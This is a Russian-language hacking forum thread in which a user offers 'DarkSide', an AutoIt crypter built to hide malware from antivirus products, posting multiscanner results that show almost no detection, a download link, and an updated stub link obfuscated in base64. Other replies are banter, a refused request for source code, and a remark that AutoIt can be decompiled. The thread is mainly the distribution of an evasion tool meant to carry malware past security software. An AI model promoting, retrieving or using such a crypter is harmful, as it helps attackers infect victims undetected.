DarkSide [Au3] Сrypter v 0.2

Тема в разделе "Крипторы и исследование защиты", создана пользователем rain.hf, 31 янв 2016.

↑ ↓
  1. rain.hf Житель форума
    rain.hf
    Ответить в чате

    Форумчанин

    Регистрация:
    08.12.2015
    Сообщения:
    134
    Симпатии:
    111
    Репа:
    +121 / 3 / -6
    [​IMG]

    Code in AutoIT
    itself inject
    ByPass (avast,nod,kis,avira,malvarebyts,norton)
    only native file

    Filename: Stub.exe
    Type: File
    Filesize: 550480 bytes
    Date: 31/01/2016 - 06:34 GMT+2
    MD5: 35d0b9b98e9ebbe0ddcc8a370c0ad1f1
    SHA1: 1f0b0c77e3650b90ee51d7aa33d39f5b6e7eacfe
    Status: Infected
    Result: 1/35

    AVG Free - OK
    Avast - OK
    AntiVir (Avira) - OK
    BitDefender - OK
    Clam Antivirus - OK
    COMODO Internet Security - OK
    Dr.Web - OK
    eTrust-Vet - OK
    F-PROT Antivirus - OK
    F-Secure Internet Security - OK
    G Data - OK
    IKARUS Security - OK
    Kaspersky Antivirus - OK
    McAfee - OK
    MS Security Essentials - OK
    ESET NOD32 - OK
    Norman - OK
    Norton Antivirus - OK
    Panda Security - OK
    A-Squared - OK
    Quick Heal Antivirus - OK
    Solo Antivirus - OK
    Sophos - OK
    Trend Micro Internet Security - OK
    VBA32 Antivirus - infected Trojan.Autoit.F
    Zoner AntiVirus - OK
    Ad-Aware - OK
    BullGuard - OK
    FortiClient - OK
    K7 Ultimate - OK
    NANO Antivirus - OK
    Panda CommandLine - OK
    SUPERAntiSpyware - OK
    Twister Antivirus - OK
    VIPRE - OK

    Scan Result: MaJyx Scanner | Results
    Scan by MaJyx Scanner

    Filename: encrypt file.exe
    Type: File
    Filesize: 1427543 bytes
    Date: 31/01/2016 - 06:33 GMT+2
    MD5: 518eb267a04306d5af528bf655f57f2f
    SHA1: 6bfaef675bd9c44fa550d0a81d6a526bad009cd6
    Status: Infected
    Result: 1/35

    AVG Free - OK
    Avast - OK
    AntiVir (Avira) - OK
    BitDefender - OK
    Clam Antivirus - OK
    COMODO Internet Security - OK
    Dr.Web - OK
    eTrust-Vet - OK
    F-PROT Antivirus - OK
    F-Secure Internet Security - OK
    G Data - OK
    IKARUS Security - OK
    Kaspersky Antivirus - OK
    McAfee - OK
    MS Security Essentials - OK
    ESET NOD32 - OK
    Norman - OK
    Norton Antivirus - OK
    Panda Security - OK
    A-Squared - OK
    Quick Heal Antivirus - OK
    Solo Antivirus - OK
    Sophos - OK
    Trend Micro Internet Security - OK
    VBA32 Antivirus - infected Trojan.Autoit.F
    Zoner AntiVirus - OK
    Ad-Aware - OK
    BullGuard - OK
    FortiClient - OK
    K7 Ultimate - OK
    NANO Antivirus - OK
    Panda CommandLine - OK
    SUPERAntiSpyware - OK
    Twister Antivirus - OK
    VIPRE - OK

    Scan Result: MaJyx Scanner | Results
    Scan by MaJyx Scanner


    https://www.sendspace.com/file/0fygjp​
     
    • Мне нравится Мне нравится x 2
  2. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.811
    Симпатии:
    429
    Пол:
    Мужской
    Репа:
    +963 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    dushu88bam88
    Не успел...big010101Dmeh-Smeh-Smeh!!!
     
  3. Khorne Уважаемый пользователь
    Khorne
    Ответить в чате

    Форумчанин

    Регистрация:
    14.12.2014
    Сообщения:
    266
    Симпатии:
    267
    Пол:
    Мужской
    Репа:
    +293 / 6 / -7
    Эти дегустаторы достали.Один хер сегодня ночью 21 пост захерачил.
     
  4. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.811
    Симпатии:
    429
    Пол:
    Мужской
    Репа:
    +963 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Ну стандартный приём, пока админ спит, я на одном форуме как-то 170 постов нафлудил, правда там потом ещё надо-было 80 лайков набрать, двойной хайд...Dmeh-Smeh-Smeh!!!NO-no!!!NO-no!!!NO-no!!!
     
  5. rain.hf Житель форума
    rain.hf
    Ответить в чате

    Форумчанин

    Регистрация:
    08.12.2015
    Сообщения:
    134
    Симпатии:
    111
    Репа:
    +121 / 3 / -6
    Stub Update 04/02/16

    VirusCheckMate.com free virus scanner results

    Information

    Results
    1. Arcavir Antivirus 2014 : Clean
    2. avast! Internet Security : Win32:Evo-gen [Susp]
    3. AVG Anti-Virus : Clean
    4. Avira Antivirus Suite : Clean
    5. Bitdefender Antivirus Plus : Clean
    6. Clam AntiVirus : Clean
    7. COMODO Internet Security : Clean
    8. Dr.Web Anti-virus : Clean
    9. eScan Antivirus : Clean
    10. ESET NOD32 Antivirus : Clean
    11. F-PROT Antivirus for Windows : Clean
    12. F-Secure Internet Security 2014 : Clean
    13. FortiClient Lite : Clean
    14. IKARUS anti.virus : Clean
    15. Jiangmin Antivirus 2011 : Clean
    16. K7 UltimateSecurity : Clean
    17. Kaspersky Anti-Virus : Clean
    18. McAfee VirusScan Enterprise : Clean
    19. Quick Heal Internet Security : Clean
    20. Sophos Anti-Virus : Clean
    21. Symantec Endpoint Protection : Clean
    22. Total Defence Anti-Virus 2011 : Clean
    23. Zillya! Internet Security : Clean

    download new stub

    aHR0cHM6Ly93d3cuc2VuZHNwYWNlLmNvbS9maWxlLzB5ZTN4bA ==
     
    • Мне нравится Мне нравится x 2
  6. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.811
    Симпатии:
    429
    Пол:
    Мужской
    Репа:
    +963 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    А что это за хеш такой интересный ?sholoh it
     
  7. rain.hf Житель форума
    rain.hf
    Ответить в чате

    Форумчанин

    Регистрация:
    08.12.2015
    Сообщения:
    134
    Симпатии:
    111
    Репа:
    +121 / 3 / -6
    base64
     
    • Мне нравится Мне нравится x 1
  8. wandereri Житель форума
    wandereri
    Ответить в чате

    Форумчанин

    Регистрация:
    17.12.2015
    Сообщения:
    3
    Симпатии:
    0
    Пол:
    Мужской
    Репа:
    +0 / 0 / -0
    А можно исходники ?пожалуйста
     
  9. rain.hf Житель форума
    rain.hf
    Ответить в чате

    Форумчанин

    Регистрация:
    08.12.2015
    Сообщения:
    134
    Симпатии:
    111
    Репа:
    +121 / 3 / -6
    сорцеёб что ли ? если бы я раздавал сорцы то это был бы опен сорс , и была б ссылка на репозиторий гит хаба
     
    • Мне нравится Мне нравится x 1
  10. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.811
    Симпатии:
    429
    Пол:
    Мужской
    Репа:
    +963 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    А это АутоИТ, если да то можно декомпельнуть вроде...

    Другое дело если не вкуриваешь саму суть и смысла в сорцах нет, а если вкуриваешь, то непроблема в целом и самому сделать...

    А так сорцев достаточно и разных в сети...
     

Поделиться этой страницей